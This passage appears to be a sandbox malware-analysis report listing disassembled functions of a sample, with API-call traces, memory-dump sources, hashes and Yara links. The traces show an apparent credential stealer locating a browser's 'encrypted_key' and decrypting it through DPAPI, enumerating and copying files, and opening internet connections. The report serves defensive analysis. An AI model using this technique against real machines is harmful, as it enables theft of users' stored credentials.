                                                                                                                                                                                                                                                          Function 00FE87ED Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8833
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86AE
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: LocalAlloc.KERNEL32(00000040,?,?,?,00FE6716,?), ref: 00FE86BC
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86D2
                                                                                                                                                                                                                                                            • Part of subcall function 00FE8696: LocalFree.KERNEL32(?,?,?,00FE6716,?), ref: 00FE86E1
                                                                                                                                                                                                                                                            • Part of subcall function 00FE86EF: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00FE8889), ref: 00FE8712
                                                                                                                                                                                                                                                            • Part of subcall function 00FE86EF: LocalAlloc.KERNEL32(00000040,00FE8889,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE8726
                                                                                                                                                                                                                                                            • Part of subcall function 00FE86EF: LocalFree.KERNEL32(00FECD1F,?,?,00FE8889,00FECD1F,?,?,?,?,?,?,?,00FECE1A,?,?), ref: 00FE874B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                          • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                                                                          • API String ID: 2311102621-738592651
                                                                                                                                                                                                                                                          • Opcode ID: e0d4bb6ee4a939be98c8e37da71e0e1f37afcb60d503d8b28f0acbde15e8546a
                                                                                                                                                                                                                                                          • Instruction ID: 748f441cbb000252a4a148fbe942ad99b3ede3d8b77052bc5a9a4565aed6c3ac
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0d4bb6ee4a939be98c8e37da71e0e1f37afcb60d503d8b28f0acbde15e8546a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F218E32E00249ABDF14FAA6DC81ADE7774AF003A0F5445A9ED14B72D1DF74AF06DA90
                                                                                                                                                                                                                                                          Function 6CD68374 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 6CD6837C
                                                                                                                                                                                                                                                            • Part of subcall function 6CD682D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CD6A340,?,00000000,-00000008), ref: 6CD68332
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CD683B4
                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CD683D4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                          • Opcode ID: 2ce9bec80032c1b35506a1f9787d99dd6b58b35431d068f32846cc0e54fec434
                                                                                                                                                                                                                                                          • Instruction ID: 2fb03e1aaaf9fd442ebf21f502b08df29629ea09839f0324bf547d740caba67e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ce9bec80032c1b35506a1f9787d99dd6b58b35431d068f32846cc0e54fec434
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D911C4B1A01629BF670117779C8CCAFBA6DEE4B29DB00012AF904D2E10FB70DD15D270
                                                                                                                                                                                                                                                          Function 00FF683C Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00FF6884
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01015B34), ref: 00FF68A1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF68B4
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01015B38), ref: 00FF68C6
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF61F5
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindFirstFileA.KERNEL32(?,?), ref: 00FF620C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015A9C), ref: 00FF622D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015AA0), ref: 00FF6247
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF626E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,0101565D), ref: 00FF6282
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF629F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: PathMatchSpecA.SHLWAPI(?,?), ref: 00FF62CC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?), ref: 00FF6302
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015AB8), ref: 00FF6314
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF6327
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015ABC), ref: 00FF6339
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF634D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF62B6
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF6406
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: DeleteFileA.KERNEL32(?), ref: 00FF647A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindNextFileA.KERNEL32(?,?), ref: 00FF64DC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindClose.KERNEL32(?), ref: 00FF64F0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2104210347-0
                                                                                                                                                                                                                                                          • Opcode ID: f2f6d255115a1a3da77332a709a9e3dc338c4c6a3347b990a88adf085a1b6bb2
                                                                                                                                                                                                                                                          • Instruction ID: 29ff1fc63faed1987baecc78e920f58e6abd7dbe7fe8e0feaf8a35eb5befd3c6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f6d255115a1a3da77332a709a9e3dc338c4c6a3347b990a88adf085a1b6bb2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A521AE32A0011CAFDB60EB65EC4AAD977B9FF19300F4044A5B788E7255DE799AC49F80
                                                                                                                                                                                                                                                          Function 00FF0EE3 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,010155C7,?,?,?), ref: 00FF0EFB
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF0F02
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00FF0F0E
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF0F39
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1243822799-0
                                                                                                                                                                                                                                                          • Opcode ID: 645985c93a169d668c632bddf07ad9b58930e08467042fbc5c908187aeb7cc8a
                                                                                                                                                                                                                                                          • Instruction ID: 3d276ce8997a27e1305c0922566553cfc7630867cea733e81fe7683fcec67dc2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 645985c93a169d668c632bddf07ad9b58930e08467042fbc5c908187aeb7cc8a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F0ECB5900129BFDB60ABE9A909ABF77FCAF0C611F404055FB41E2184E63D9A40D7B5
                                                                                                                                                                                                                                                          Function 00FF2389 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00FF5189,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00FF5189,?), ref: 00FF23A4
                                                                                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00FF5189,?,?,?,00FF5189,?), ref: 00FF23BC
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00FF5189,?), ref: 00FF23C7
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00FF5189,?), ref: 00FF23CF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4148174661-0
                                                                                                                                                                                                                                                          • Opcode ID: f66cf1a8dba244477cc9e9fb401b0c0f1507817e28e0f932b00036b51f305c60
                                                                                                                                                                                                                                                          • Instruction ID: bce7113e2943e79ee6d71ab0c94ae13cefbacbe7ebd31df127ce13ed47dc7c8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f66cf1a8dba244477cc9e9fb401b0c0f1507817e28e0f932b00036b51f305c60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F08271640118FFE7609AA0EC0DFAA3A6DEF44760F108110FB41A21D4E7B0AE00ABA4
                                                                                                                                                                                                                                                          Function 6CD6C226 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000), ref: 6CD6C23D
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000,?,?,?,6CD6B23A,00000000), ref: 6CD6C249
                                                                                                                                                                                                                                                            • Part of subcall function 6CD6C20F: CloseHandle.KERNEL32(FFFFFFFE,6CD6C259,?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000,?,?), ref: 6CD6C21F
                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 6CD6C259
                                                                                                                                                                                                                                                            • Part of subcall function 6CD6C1D1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CD6C200,6CD6B9C6,?,?,6CD6AC94,?,00000000,00000000,?), ref: 6CD6C1E4
                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6CD6B9D9,00000000,00000001,00000000,?,?,6CD6AC94,?,00000000,00000000,?), ref: 6CD6C26E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                          • Opcode ID: 29e5b28ab382dd1c7d62d125d87c6f44938841ce834b9bc508a7124fba46f3ff
                                                                                                                                                                                                                                                          • Instruction ID: 30b9e75d5b161829ec5ff8e7317056161a02068674de2da29c8411ca4ce1f4c8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e5b28ab382dd1c7d62d125d87c6f44938841ce834b9bc508a7124fba46f3ff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2F0F836640164BBDF222FD68C489CA3E7AEB4A2A1F054610FF1985920C732C920EBA5
                                                                                                                                                                                                                                                          Function 00FF2DBF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FE5270
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: RtlAllocateHeap.NTDLL(00000000), ref: 00FE5277
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00FE5299
                                                                                                                                                                                                                                                            • Part of subcall function 00FE5229: StrCmpCA.SHLWAPI(?), ref: 00FE52B3
